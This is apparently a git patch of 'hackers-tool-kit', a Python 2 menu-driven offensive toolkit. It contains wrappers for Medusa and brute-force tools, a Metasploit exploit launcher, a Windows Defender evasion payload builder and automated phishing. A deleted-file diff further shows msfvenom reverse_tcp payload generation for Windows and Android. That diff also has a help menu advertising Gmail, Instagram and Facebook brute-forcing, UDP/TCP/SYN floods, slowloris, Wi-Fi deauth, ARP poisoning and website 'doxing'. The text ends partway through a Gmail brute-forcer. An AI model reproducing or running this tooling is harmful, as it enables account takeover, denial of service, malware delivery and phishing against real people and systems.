jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + found = True +mainbanner() +main() From 7c7180fe9533a0e28ab6d56b6eaca91e9bd7b934 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 20:11:12 +0100 Subject: [PATCH 058/214] Delete htk.py --- htk.py | 2054 -------------------------------------------------------- 1 file changed, 2054 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 88d29d6..0000000 --- a/htk.py +++ /dev/null @@ -1,2054 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arppois : ARP poisoning | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = 